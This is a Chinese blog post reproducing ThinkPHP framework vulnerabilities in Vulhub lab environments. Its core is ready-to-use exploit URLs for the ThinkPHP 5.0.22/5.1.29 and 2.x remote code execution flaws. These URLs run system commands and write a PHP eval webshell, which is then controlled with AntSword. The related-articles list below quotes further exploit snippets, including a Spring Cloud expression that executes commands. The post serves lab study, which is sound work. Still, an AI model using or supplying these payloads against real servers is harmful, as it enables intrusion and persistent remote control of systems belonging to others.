Vulhub复现--ThinkPHP框架系列(二)

最新推荐文章于 2024-06-27 11:47:03 发布
最新推荐文章于 2024-06-27 11:47:03 发布
阅读量358 收藏
点赞数
分类专栏: 漏洞复现 文章标签: php 网络安全 漏洞复现 web安全 ThinkPHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39291229/article/details/130408550
版权
文章详细介绍了ThinkPHP5.0.22和5.1.29版本的远程代码执行漏洞,以及ThinkPHP2.x的任意代码执行问题。通过提供POC(ProofofConcept),展示了如何触发这些漏洞以执行系统命令和写入webshell。同时,提到了使用蚁剑工具进行webshell的连接和控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

ThinkPHP5 5.0.22/5.1.29远程代码执行漏洞

ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP5 5.0.22/5.1.29远程代码执行漏洞

环境路径:thinkphp/5-rce

启动环境时修改一下docker-compose.yml 将版本由3改为2即可正常启动

根据提示访问8080端口

POC

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

system系统命令

http://192.168.20.158:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

写马 a.php

http://192.168.20.158:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=a.php&vars[1][]=%3C?php%20@eval($_POST[a]);%20?%3E

蚁剑连接

拿下webshell

ThinkPHP 2.x 任意代码执行漏洞

环境路径:thinkphp/2-rce

启动环境时修改一下docker-compose.yml 将版本由3改为2即可正常启动

payoad

http://192.168.20.158:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D

写马payload

http://192.168.20.158:8080/index.php?s=a/b/c/${@print(eval($_POST[a]))}

蚁剑连接

成功拿下webshell

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2689
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露
qq_51577576的博客
09-29 1882
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 Thinkphp5X设计缺陷导致泄漏数据库账户密码
ThinkPHP5.0.24_反序列化漏洞在Linux下的写马分析
11-21 4728
ThinkPHP5.0.24_反序列化漏洞在Linux下的写马分析 ThinkPHP5.0.24 漏洞代码<?php namespace app\index\controller; class Index { public function test01(){ $code = $_POST['code']; unserialize(base64_decode($code)); } } payload/index.php/index/index/t
Vulhub复现--ThinkPHP框架系列(一)
tzyyyyyy的博客
04-27 803
Vulhub靶场关于ThinkPHP框架漏洞复现
Thinkphp QVD-2022-46174 多语言rce
qq_61768489的博客
01-18 2181
如果 Thinkphp 程序开启了多语言功能,那就可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。PHP环境开启了PHP环境安装了pcel/pearDocker默认的PHP环境恰好满足上述条件。所以先使用vulhub进行漏洞利用的复现
vulhubthinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现
qq_58873970的博客
09-07 733
----------------梦想,想像力和希望实现这些梦想的人的勇气充满希望。
框架漏洞-CVE复现-ThinkPHP+Laravel+Struts+Spring
xiaoheizi的博客
07-16 565
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("要执行的命令")就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。工具:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP。我要执行的是反弹shell命令,需要先对命令进行编码。
vuhub thinkphp-5-rce漏洞复现
qq_46804551的博客
04-24 662
搭建 your-ip:8080 搭建成功 漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现
千寻的博客
12-19 5927
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备漏洞发现漏洞复现(数据包)漏洞复现(工具)修复建议摘抄免责声明 漏洞名称 ThinkPHP 5.0.23 远程代码执行漏洞 漏洞编号 CVE-2018-20062 漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名, 导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1987
【thinkcmf-文件包含】public函数
[Vulhub] ThinkPHP漏洞合集
weixin_45605352的博客
05-11 3007
0x01 复现环境 攻击机:kali linux,Windows 10 x64 靶机:XXE(下载链接https://www.vulnhub.com/entry/xxe-lab-1,254/) 网络设置:均为桥接模式 0x02 漏洞复现 主机发现&端口扫描 先确定靶机ip地址,这里用arp-scan -l命令探测内网: 发现靶机地址为192.168.43.228,接下来用nmap -sV -p- 192.168.43.228 扫描一下: -sV:探测端口服务版本;-p:指定端口-v:显示扫描过
Thinkphp---入门操作总结1
weixin_43846020的博客
01-26 510
一.下载 thinkPHP5.0+手册下载 把下载好的解压命名为tp5(自己随意命名)放在xampp的htdocs里面。 访问:用localhost::8090即可访问主页的 (我用的是8090端口,如果你是80端口直接localhost或localhost::80即可) .配置虚拟文件(我用的是xampp) 到apache/conf/extra/http-vhosts.conf中 //我的...
渗透测试实战-文件包含和日志文件写入木马混合利用
网络安全领域优质创作者
02-27 2371
1.起因 我有一个朋友,让我帮忙测试一下他的站,于是有了这篇文章。(无中生友篇) 2.信息收集 访问首页一下先,看到是thinkphp v5.0版本。 然后谷歌大法,直接上TP 5.X RCE的EXP,一顿骚操作: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=sy...
ThinkPHP接口的位置与意义
最新发布
LT88997的博客
06-27 463
就个人而言ThinkPHP接口的位置和意义在Web开发中具有重要的地位。因此,在使用ThinkPHP进行Web开发时,我们应该重视接口的设计和实现工作。在Web开发的领域里,接口作为前后端交互的桥梁,其重要性不言而喻。而在使用ThinkPHP这一流行的PHP框架时,明确接口的位置和如何构建它们,对于项目的顺利进行和系统的安全性至关重要。本文旨在详细讨论ThinkPHP接口的位置及其在项目中的意义。在ThinkPHP中,接口并非一个独立的物理位置,而是由路由、控制器和模型等多个组件共同构成的逻辑概念。
php5.0+修改端口,在thinkPHP5.0里面为项目添加端口
weixin_29707757的博客
03-18 822
1.首先进入到nginx的配置目录,如图所示: 然后一份复制已经配好的文件cp 原文件 新文件cp yezi.conf tt.conf新建tt.conf|然后编辑它vim tt.conf修改 listen端口号以及项目路径 ,root /home/yemengdi/public保存退出 wq!最后重启lnmp环境lnmp restartll命令查看新建文件的信息(l 命令列出的信息更加详细,有时间...
01-Thinkphp基础配置
qq_49283465的博客
09-07 628
自主下载composer(php包管理工具),配置相应的环境变量,下载完成后部署thinkphp框架。//用户访问xxx.com/test2/调用test2控制器里的admini方法。1、thinkphp前期配置包含哪些(包、环境变量、验证、修复、监听其他端口)?runtime目录:(运行文件夹,一般用不到)app目录下:(应用目录,负责网站控制)!public目录:(保存静态文件和主页)!vendor目录:(composer目录)config目录:(配置目录)!route目录:(路由文件)!
thinkphp端口配置
weixin_33882443的博客
08-30 1909
&lt;?php return array( //'配置项'=&gt;'配置值' 'MODULE_ALLOW_LIST' =&gt; array('Home'), 'DEFAULT_MODULE' =&gt; 'Home', // 默认模块 'APP_URL' =&gt; 'http://app.we...
thinkphp 同域名,同端口,同ip下session冲突问题
cms专家
07-06 2185
万恶之源,就在tp设置的 sessionid 都为一个值PHPSESSID。 不管哪个项目,哪个端口,哪个域名之哟啊他们都在同服务器下,那么 他们保存的session都为一个:PHPSESSID。 如果遇到同一个账户,便在各个项目里面公用,如果账户不一样,就会出现session经常失效问题,甚至会出现不同客户端访问 有的能正常登陆,有的不能。 解决办法: 需要修改不同项目的ses
thinkphp端口配置8080
chuojia5246的博客
12-09 1571
<?php return array( //'配置项'=>'配置值' 'MODULE_ALLOW_LIST' => array('Home'), 'DEFAULT_MODULE' => 'Home', // 默认模...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tzyyyyyy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值